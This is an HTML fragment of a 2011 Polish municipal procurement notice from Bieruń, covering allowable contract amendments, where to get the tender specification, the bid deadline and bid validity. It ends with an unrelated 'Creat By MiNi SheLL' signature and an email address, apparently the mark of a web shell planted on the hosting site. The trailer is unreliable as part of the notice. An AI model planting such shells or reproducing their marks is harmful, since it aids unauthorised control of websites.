<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany zawartej z Wykonawcą umowy w zakresie:
a.  wartości umownej, w przypadku wprowadzenia zmian VAT, który będzie naliczany  
     zgodnie z obowiązującą stawką; 
b.  zmiany osób, które będą uczestniczyć w wykonywaniu przedmiotu umowy                       
     z zachowaniem wymagań określonych w SIWZ;, jakie osoby te powinny spełniać; 
            c. terminu realizacji i jego poszczególnych etapów, w szczególności spowodowane: 
                długotrwałymi opadami deszczu lub innymi warunkami atmosferycznymi, 
                uniemożliwiającymi realizację przedmiotu zamówienia;
d. mającym wpływ na realizację przedmiotu umowy, w przypadku gdy nastąpi zmiana 
    powszechnie obowiązujących przepisów prawa; 
e. innych zmian, których nie można było przewidzieć na etapie sporządzania SIWZ, 
    a które nie wykraczają poza zakres art. 140 ustawy pzp</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bierun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bieruniu - Referat Zamówień Publicznych
43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2011 godzina 12:00, miejsce: Urząd Miejski w Bieruniu - kancelaria (parter)
43-150 Bieruń, ul.Rynek 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com